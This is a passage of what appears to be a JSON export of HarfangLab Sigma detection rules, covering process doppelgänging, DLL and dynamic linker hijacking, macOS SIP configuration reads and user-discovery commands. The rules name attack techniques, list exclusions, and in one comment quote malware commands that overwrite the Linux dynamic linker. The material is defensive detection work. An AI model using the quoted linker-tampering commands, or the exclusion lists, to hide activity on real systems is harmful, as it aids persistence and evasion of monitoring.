"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090178Z",
"creation_date": "2026-03-23T11:45:34.090180Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090184Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/",
"https://github.com/hasherezade/process_doppelganging",
"https://attack.mitre.org/techniques/T1055/013/"
],
"name": "t1055_process_doppelganging.yml",
"content": "title: Process Doppelgänging Detected\nid: e95e0452-fb72-4d16-c2c6-5c75984af301\ndescription: |\n Detects the process doppelgänging injection technique.\n Process doppelgänging, similarly to process hollowing/RunPE, involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. However, in the case of process doppelgänging, the file image is overwritten via NTFS transactions before the process is even started.\n It is recommended to investigate the process responsible for the injection as well as the injected process to look for malicious actions or content.\nreferences:\n - https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/\n - https://github.com/hasherezade/process_doppelganging\n - https://attack.mitre.org/techniques/T1055/013/\ndate: 2025/09/01\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.013\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_agent_version:\n AgentVersion|gte|version: 4.14.0\n\n selection_transacted:\n IsFileObjectTransacted: 'true'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e95e0452-fb72-4d16-c2c6-5c75984af301",
"rule_name": "Process Doppelgänging Detected",
"rule_description": "Detects the process doppelgänging injection technique.\nProcess doppelgänging, similarly to process hollowing/RunPE, involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. However, in the case of process doppelgänging, the file image is overwritten via NTFS transactions before the process is even started.\nIt is recommended to investigate the process responsible for the injection as well as the injected process to look for malicious actions or content.\n",
"rule_creation_date": "2025-09-01",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.013"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e97354a2-fdfc-4d08-a1b2-6edae8abf311",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605037Z",
"creation_date": "2026-03-23T11:45:34.605040Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605048Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.intrinsec.com/apt27-analysis/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_psloggedon.yml",
"content": "title: Logged-on Users Discovered via PsLoggedOn\nid: e97354a2-fdfc-4d08-a1b2-6edae8abf311\ndescription: |\n Detects the execution of the PsLoggedOn utility, part of the Sysinternals suite, which enumerates local and remote system logon sessions.\n While legitimate for administrative use, attackers often leverage this tool to identify logged-in users and backup accounts, aiding in lateral movement and privilege escalation.\n It is recommended to investigate PsLoggedOn execution context and scope, verify authorization of use, and correlate with other discovery activities.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/10/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\psloggedon.exe'\n - OriginalFileName: 'psloggedon.exe'\n condition: selection\nlevel: medium\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e97354a2-fdfc-4d08-a1b2-6edae8abf311",
"rule_name": "Logged-on Users Discovered via PsLoggedOn",
"rule_description": "Detects the execution of the PsLoggedOn utility, part of the Sysinternals suite, which enumerates local and remote system logon sessions.\nWhile legitimate for administrative use, attackers often leverage this tool to identify logged-in users and backup accounts, aiding in lateral movement and privilege escalation.\nIt is recommended to investigate PsLoggedOn execution context and scope, verify authorization of use, and correlate with other discovery activities.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9b08d80-18f6-45d9-b8c0-c09b284e842c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622202Z",
"creation_date": "2026-03-23T11:45:34.622204Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622208Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/",
"https://attack.mitre.org/techniques/T1574/006/"
],
"name": "t1574_006_possible_dynamic_linked_highjacking.yml",
"content": "title: Dynamic Linker Possibly Hijacked\nid: e9b08d80-18f6-45d9-b8c0-c09b284e842c\ndescription: |\n Detects the suspicious execution of commands related to dynamic linker hijacking.\n Dynamic linker hijacking is a technique used to achieve persistence and execution by tampering with dynamically loaded libraries.\n This method has already been used by the Orbit backdoor in a July 2022 campaign, allowing it to hook system calls in order to hide its files, network connections and other artifacts.\n It is recommended to investigate the command-line, the file being copied, and the execution context to determine if this action was legitimate.\nreferences:\n - https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/\n - https://attack.mitre.org/techniques/T1574/006/\ndate: 2022/07/11\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Hijacking\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # cp -p XXX ld-linux*.so.2\n # cp -p ld-linux*.so.2 XXX\n # mv XXX ld-linux*.so.2\n # mv ld-linux*.so.2 XXX\n selection_bin:\n Image|endswith:\n - '/mv'\n - '/cp'\n - '/cat'\n\n selection_cmd:\n CommandLine|contains:\n - 'ld-linux-x86-64.so.2'\n - 'ld-linux.so.2'\n\n exclusion_initramfs:\n # cp --sparse=always -pfL /lib64/ld-linux-x86-64.so.2 /var/tmp/dracut.LwaqEu/initramfs//lib64/ld-linux-x86-64.so.2\n # cp --reflink=auto --sparse=auto --preserve=mode,xattr,timestamps -fL /lib64/ld-linux-x86-64.so.2 /var/tmp/dracut.LwaqEu/initramfs/lib64/ld-linux-x86-64.so.2\n # cp -pP /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /var/tmp/mkinitramfs_CJIkzz//usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\n CommandLine|contains:\n - ' /var/tmp/dracut.*/initramfs/'\n - 
'/temp/dracut.*/initramfs/'\n - ' /var/tmp/mkinitramfs_*/'\n - ' /tmp/tmp.*/mkinitramfs_*/'\n - ' /run/initramfs/'\n\n exclusion_distupgrade:\n # apt-get dist-upgrade\n # cp --no-dereference --preserve=all --reflink=auto --sparse=always /lib64/ld-linux-x86-64.so.2 /usr/lib64/ld-linux-x86-64.so.2\n ParentCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n\n exclusion_mkinitcpio:\n - ParentCommandLine|startswith: 'bash /usr/bin/mkinitcpio -k '\n - GrandparentCommandLine:\n - 'bash /usr/bin/mkinitcpio -p linux'\n - 'bash /usr/bin/mkinitcpio -P'\n\n exclusion_mkchroot:\n ParentCommandLine|startswith:\n - '/bin/bash /bin/mkchroot '\n - '/bin/bash /usr/bin/mkchroot '\n - '/bin/bash /usr/local/bin/mkchroot '\n\n exclusion_mkinitrd:\n ParentCommandLine|startswith: '/bin/sh /usr/sbin/mkinitrd '\n\n exclusion_gentoo_glibc:\n GrandparentImage:\n - '/usr/bin/gmake'\n - '/usr/bin/make'\n GrandparentCommandLine|contains: '/var/tmp/portage/sys-libs/glibc-*/work/glibc-* '\n\n exclusion_container:\n ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_dpkg:\n ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_rear:\n ProcessParentCommandLine:\n - '/bin/bash /usr/sbin/rear mkbackup'\n - '/bin/bash -* /usr/sbin/rear mkbackup'\n\n exclusion_make:\n ProcessImage: '/usr/bin/mv'\n ProcessParentImage: '/usr/bin/make'\n\n exclusion_dracut:\n ProcessParentImage: '/usr/lib/dracut/dracut-install'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9b08d80-18f6-45d9-b8c0-c09b284e842c",
"rule_name": "Dynamic Linker Possibly Hijacked",
"rule_description": "Detects the suspicious execution of commands related to dynamic linker hijacking.\nDynamic linker hijacking is a technique used to achieve persistence and execution by tampering with dynamically loaded libraries.\nThis method has already been used by the Orbit backdoor in a July 2022 campaign, allowing it to hook system calls in order to hide its files, network connections and other artifacts.\nIt is recommended to investigate the command-line, the file being copied, and the execution context to determine if this action was legitimate.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2026-01-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9b31c16-7433-4a48-bc59-19fd250d5a09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075724Z",
"creation_date": "2026-03-23T11:45:34.075726Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075730Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wechat.yml",
"content": "title: DLL Hijacking via WeChat.exe\nid: e9b31c16-7433-4a48-bc59-19fd250d5a09\ndescription: |\n Detects potential Windows DLL Hijacking via WeChat.exe related to Coc Coc Browser Update Software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessProduct: 'WeChat'\n ProcessDescription: 'WeChat'\n ProcessCompany: 'Tencent'\n ImageLoaded|endswith: '\\WeChatWin.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Tencent\\WeChat\\'\n - '?:\\Program Files (x86)\\Tencent\\WeChat\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Tencent\\WeChat\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Tencent\\WeChat\\'\n - '?:\\Program Files (x86)\\Tencent\\WeChat\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Tencent\\WeChat\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Tencent Technology(Shenzhen) Company Limited'\n # 390f6e7c2bf17b861ec245e57d0a876abcde8f3b028004fb0ad9d371d71049ff\n - 'Tencent 
Technology (Shenzhen) Company Limited'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9b31c16-7433-4a48-bc59-19fd250d5a09",
"rule_name": "DLL Hijacking via WeChat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WeChat.exe related to Coc Coc Browser Update Software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9b7db41-b51f-401a-be74-71189416dc78",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.614902Z",
"creation_date": "2026-03-23T11:45:34.614905Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.614913Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/v/fr/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip",
"https://attack.mitre.org/techniques/T1543/"
],
"name": "t1543_rootless_conf_read.yml",
"content": "title: Suspicious Read Access to Rootless Configuration File\nid: e9b7db41-b51f-401a-be74-71189416dc78\ndescription: |\n Detects a suspicious access to the rootless configuration file which holds the monitored paths protected from being modified or deleted by the System Integrity Protection (SIP) feature.\n Adversaries may use files present in the rootless configuration file but not present in the filesystem to establish a persistence protected from deletion by the SIP.\n It is recommended to verify if the process performing the read operation has legitimate reason to do it.\nreferences:\n - https://book.hacktricks.xyz/v/fr/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip\n - https://attack.mitre.org/techniques/T1543/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Path: '/System/Library/Sandbox/rootless.conf'\n Kind: 'read'\n ProcessImage|contains: '?'\n\n filter_csrutil:\n Image: '/usr/bin/csrutil'\n\n filter_installer:\n ProcessImage: '/usr/sbin/installer'\n\n filter_update:\n - Image: '/private/var/db/com.apple.xpc.roleaccountd.staging/*.*.xpc/Contents/MacOS/com.apple.MobileSoftwareUpdate.UpdateBrainService'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.MobileSoftwareUpdate.UpdateBrainService'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n 
Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n 
exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_acronis:\n Image: '/Applications/Acronis True Image.app/Contents/MacOS/escyberprotect.app/Contents/MacOS/escyberprotect'\n\n exclusion_image:\n ProcessImage:\n - '/sbin/md5'\n - '/usr/bin/rsync'\n - '/opt/homebrew/Cellar/rsync/*/bin/rsync'\n - '/Users/*/Applications/*/ripgrep/bin/rg'\n - '/usr/local/Cellar/ripgrep/*/bin/rg'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: 
medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9b7db41-b51f-401a-be74-71189416dc78",
"rule_name": "Suspicious Read Access to Rootless Configuration File",
"rule_description": "Detects a suspicious read access to the rootless configuration file, which lists the paths protected from modification or deletion by the System Integrity Protection (SIP) feature.\nAdversaries may create files at paths that are listed in the rootless configuration file but do not yet exist on the filesystem, in order to establish persistence that is protected from deletion by SIP.\nIt is recommended to verify that the process performing the read operation has a legitimate reason to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9cfaccc-7059-4782-b19c-b4274fa93697",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295642Z",
"creation_date": "2026-03-23T11:45:35.295645Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295651Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/w.1.html",
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1033_w_linux.yml",
"content": "title: W Execution\nid: e9cfaccc-7059-4782-b19c-b4274fa93697\ndescription: |\n Detects the execution of the \"w\" command.\n Attackers may use \"w\" during the discovery phase to retrieve the list of users currently logged on and their last action on the system.\n It is recommended to check the parent process for suspicious activities.\nreferences:\n - https://man7.org/linux/man-pages/man1/w.1.html\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2022/12/23\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1049\n - attack.t1087.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/w'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/bin/run-parts|'\n - '|/usr/sbin/crond|'\n\n exclusion_update_motd:\n # /bin/sh /etc/update-motd.d/17-users\n ParentCommandLine|startswith: '/bin/sh /etc/update-motd.d/'\n\n exclusion_cinnamon_screensaver:\n ParentImage: '/usr/bin/python3.*'\n ParentCommandLine:\n - '/usr/bin/python3 /usr/bin/cinnamon-screensaver'\n - '/usr/bin/python3 /usr/share/cinnamon-screensaver/cinnamon-screensaver-main.py'\n\n exclusion_cohesity:\n GrandparentCommandLine|contains: '/opt/cohesity/agent/software/crux/bin/'\n\n exclusion_udevadm:\n Ancestors|endswith: '|/usr/bin/udevadm|/usr/lib/systemd/systemd'\n\n exclusion_x11vnc:\n Ancestors|endswith: '|/usr/bin/x11vnc|/usr/lib/systemd/systemd'\n\n exclusion_nagios:\n - ParentImage: '/usr/sbin/nrpe'\n - Ancestors|contains: '|/usr/sbin/nrpe|'\n - CurrentDirectory: '/usr/nagios/plugins/'\n\n # 760503f9eeb84437f5debd416e38577eb14499a32d94e154dff016f13e55297f\n exclusion_vxc:\n CommandLine|startswith: 'w -h'\n ParentCommandLine: '/bin/bash /usr/bin/vxc-init'\n\n exclusion_wapt:\n - ProcessParentImage: 
'/opt/wapt/wapt-get.bin'\n - ProcessAncestors|contains: '|/opt/wapt/wapt-get.bin|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9cfaccc-7059-4782-b19c-b4274fa93697",
"rule_name": "W Execution",
"rule_description": "Detects the execution of the \"w\" command.\nAttackers may use \"w\" during the discovery phase to retrieve the list of users currently logged on and their last action on the system.\nIt is recommended to check the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-17",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1049",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e9d4a930-394e-4a87-971c-3ff014c667b6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618223Z",
"creation_date": "2026-03-23T11:45:34.618225Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618229Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nvidia.yml",
